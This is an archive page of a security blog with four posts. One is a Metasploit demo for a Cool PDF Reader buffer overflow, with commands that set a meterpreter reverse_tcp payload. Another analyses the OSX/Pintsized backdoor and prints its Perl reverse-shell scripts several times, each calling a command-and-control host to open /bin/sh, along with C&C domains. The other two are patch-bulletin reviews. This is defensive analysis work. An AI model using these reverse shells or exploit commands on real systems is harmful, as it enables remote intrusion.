All posts by wow

CVE-2012-4914 Cool PDF Image Stream Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to Secunia by Francis Provencher the 2012-12-19
Vulnerability publicly disclosed by Francis Provencher the 2013-01-18
Metasploit PoC provided the 2013-03-17

PoC provided by :

Francis Provencher
Chris Gabriel
juan vazquez

Reference(s) :

CVE-2012-4914
OSVDB-89349

Affected version(s) :

Cool PDF Reader equal or prior to version 3.0.2.256

Tested on Windows XP Pro SP3 with :

Cool PDF Reader 3.0.2.256

Description :

This module exploits a stack buffer overflow in Cool PDF Reader equal or prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/fileformat/coolpdf_image_stream_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit -j

sysinfo
getuid

OSX/Pintsized Backdoor Additional Details

In complement to my blog post regarding Facebook, Twitter and Apple victims of a watering hole attacks, you will find here under some additional informations regarding OSX/Pintsized, the backdoor used to in these attacks.

OSX/Pintsized backdoor was initially described by Intego, the 19 February, with some details. At the time of Intego post, all of the C&C components were sinkholed to Shadowserver. The backdoor was composed of clear text reverse shell perl scripts, executed a regular interval, and by a forked version of OpenSSH named “cupsd“. A RSA key was embedded in the forked OpenSSH, reported domain name of C&C was “corp-aapl.com” and reported file names were:

  • com.apple.cocoa.plist
  • cupsd (Mach-O binary)
  • com.apple.cupsd.plist
  • com.apple.cups.plist
  • com.apple.env.plist

F-Secure also reported, the 19 February, some additional C&C servers “cloudbox-storage.com” and “digitalinsight-ltd.com“. Symantec reported some additional details on the C&C domain names “cache.cloudbox-storage.com“, “img.digitalinsight-ltd.com” and “pop.digitalinsight-ltd.com“, and also reported the storage location of the forked version of OpenSSH “/Users/[USER NAME]/.cups/cupsd“.

By doing an analysis of OSX/Pintsized I can provide the following additional informations:

All files, targeting OSX, were controlled by launchd daemon through launchd.plist configuration files. Here under the list of all known launchd configuration files.

7fe4149b82516ae43938de6b8316ed84

First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443

Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443

2e35b9a683ccc2408fef5ca575abf0e6

First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443

Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443

27f241c64303e4e2d1d94d3143a48eb9

First seen: 2013-02-19 / Label: com.apple.istore / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443

Execute the following script with /usr/bin/perl

use Socket;
$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
2b9b84f0612d6f9d7efb705dd7522f83

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443

Execute the following script with /usr/bin/perl

use Socket;

<em id="__mceDel">$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
34cee92669e0c60a9dbafae7319f49db

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: img.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
d3f151b246deb74890c612606c6ad044

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$h="pop.digitalinsight-ltd.com ";
$h=~s/\s+$//;
$p=sockaddr_in(443 ,inet_aton($h));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

f419dfb35a0d220c4c53c4a087c91d5e

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("pop.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

59424d4a567ae809f96afc56d22892b2

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 999 / C&C: img.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

Here under all binary files, aka “/Users/[USER NAME]/.cups/cupsd” or “/usr/sbin/muxd“.

0ec55685affc322a5d7be2e9ca1f9cbf

First seen: 2013-01-31 / CPU Architecture: 64 bit

Fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.

3a861b8526e397b3684a99f363ec145b

First seen: 2013-02-20 / CPU Architecture: 64 bit

Fork of OpenSSH_6.0p1 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.

Here under an additional binary caught when Microsoft also pointed the fact that they were victim of this campaign.

1582d68144de2808b518934f0a02bfd6

First seen: 2013-01-22 / Internal name: javacpl.exe

One additional file who was reported linked to the campaign:

622fc8b7daf425aed7f9ffa97e30c611

First seen: 2013-01-04 / Type: Java serialized data

If you take a look at all the domain names sinkholed to Shadowserver, you will see additional domain names.

img

Domain name: corp-appl.com – Creation Date: 05-mar-2012

Domain name: cloudbox-storage.com – Creation Date: 07-dec-2012 – Sub-domains: cache.cloudbox-storage.com

Domain name: digitalinsight-ltd.com – Creation Date: 22-mar-2012 – Sub-domains: ads.digitalinsight-ltd.com, img.digitalinsight-ltd.com, www.digitalinsight-ltd.com and pop.digitalinsight-ltd.com

Domain name: clust12-akmai.net – Creation Date: 06-jun-2012 – Sub-domains:  fb.clust12-akmai.net and fbu.clust12-akmai.net

Domain name: jdk-update.com – Creation Date: 31-oct-2012 – Sub-domains:  ww1.jdk-update.com and www.jdk-update.com

Domain name: fbcbn.net – Creation Date: 09-oct-2012 – Sub-domains:  ak.fbcbn.net and static.ak.fbcbn.net

APSB13-09 – Adobe Flash March 2013 Security Bulletin Review

Adobe has release, the 12 March 2013, during his March Patch Tuesday, one Adobe Flash security bulletin dealing with four vulnerabilities. This security bulletin has a Critical severity rating. The associated vulnerabilities have all 10.0 CVSS base score.

APSB13-09 – Security updates available for Adobe Flash Player

APSB13-09 is concerning :

  • Adobe Flash Player 11.6.602.171 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.273 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.47 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.43 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.6.0.597 and earlier versions for Windows, Macintosh and Android
  • Adobe AIR 3.6.0.597 SDK and earlier versions
  • Adobe AIR 3.6.0.599 SDK & Compiler and earlier versions

CVE-2013-0646 (10.0 CVSS base score) has been discovered and privately reported by an anonymously through iDefense’s Vulnerability Contributor ProgramCVE-2013-0650 (10.0 CVSS base score) has been discovered and privately reported by a Attila Suszter of Reversing on Windows blogCVE-2013-1371 (10.0 CVSS base score) and CVE-2013-1375 (10.0 CVSS base score) have been discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

Microsoft March 2013 Patch Tuesday Review

Microsoft has release, the 12 March 2013, during his March Patch Tuesday, one updated security advisory and seven security bulletins. On the seven security bulletins four of them have a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. Update KB2824670 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin APSB13-09.

MS13-021 – Cumulative Security Update for Internet Explorer

MS13-021 security update, classified as Critical, allowing remote code execution, is the fix for 8 privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. CVE-2013-0087 (9.3 CVSS base score) was discovered and privately reported by Arseniy Akuney of TELUS Security LabsCVE-2013-0088 (9.3 CVSS base score) was discovered and privately reported by an anonymous researcher, working with HP’s Zero Day InitiativeCVE-2013-0089 (9.3 CVSS base score) was discovered and privately reported by an anonymous researcher, working with HP’s Zero Day InitiativeCVE-2013-0090 (9.3 CVSS base score) was discovered and privately reported by Stephen Fewer of Harmony Security, working with HP’s Zero Day Initiative, and SkyLined, working with HP’s Zero Day InitiativeCVE-2013-0091 (9.3 CVSS base score) was discovered and privately reported by Jose A Vazquez of Yenteasy Security Research, working with the Exodus Intelligence. CVE-2013-0092 (9.3 CVSS base score) was discovered and privately reported by [email protected], working with HP’s Zero Day InitiativeCVE-2013-0093 (9.3 CVSS base score) was discovered and privately reported by [email protected], working with HP’s Zero Day InitiativeCVE-2013-0094 (9.3 CVSS base score) was discovered and privately reported by Simon Zuckerbraun, working with HP’s Zero Day InitiativeCVE-2013-1288 (9.3 CVSS base score) was discovered and publicly disclosed by Gen Chen of Venustech ADLab and by Qihoo 360 Security Center.

MS13-022 – Vulnerability in Silverlight Could Allow Remote Code Execution

MS13-022 security update, classified as Critical, allowing remote code execution, is the fix for one privately reported vulnerability. CVE-2013-0074 (9.3 CVSS base score) was discovered and privately reported by James Forshaw of Context Information Security.

MS13-023 – Vulnerability in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution

MS13-023 security update, classified as Critical, allowing remote code execution, is the fix for one privately reported vulnerability. CVE-2013-0079 (9.3 CVSS base score) was discovered and privately reported by [email protected], working with VeriSign iDefense Labs.

MS13-024 – Vulnerabilities in SharePoint Could Allow Elevation of Privilege

MS13-024 security update, classified as Critical, allowing elevation of privilege, is the fix for four privately reported vulnerabilities. CVE-2013-0080 (7.5 CVSS base score) was discovered and privately reported by Emanuel Bronshtein of BugSecCVE-2013-0083 (4.3 CVSS base score) was discovered and privately reported by Sunil Yadav of INR Labs (Network Intelligence India). CVE-2013-0084 (7.5 CVSS base score) was discovered and privately reported by Moritz Jodeit of n.runs AGCVE-2013-0085 (7.8 CVSS base score) was discovered and privately reported by an unknown security researcher.

MS13-025 – Vulnerability in Microsoft OneNote Could Allow Information Disclosure

MS13-025 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability. CVE-2013-0086 (5.0 CVSS base score) was discovered and reported by Christopher Gabriel of Telos Corporation.

MS13-026 – Vulnerability in Office Outlook for Mac Could Allow Information Disclosure

MS13-026 security update, classified as Important, allowing information disclosure, is the fix for one privately reported vulnerability. CVE-2013-0095 (5.0 CVSS base score) was discovered and reported by Nick Semenkovich.

MS13-027 – Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege

MS13-027 security update, classified as Important, allowing elevation of privilege, is the fix for three privately reported vulnerabilities. CVE-2013-1285 (7.2 CVSS base score), CVE-2013-1286 (7.2 CVSS base score) and CVE-2013-1287 (7.2 CVSS base score) were discovered and reported by Andy Davis of NCC Group.

An interesting blog post is describing MS13-027 “Addressing an issue in the USB driver requiring physical access“. This fix look like to the Stuxnet flaw.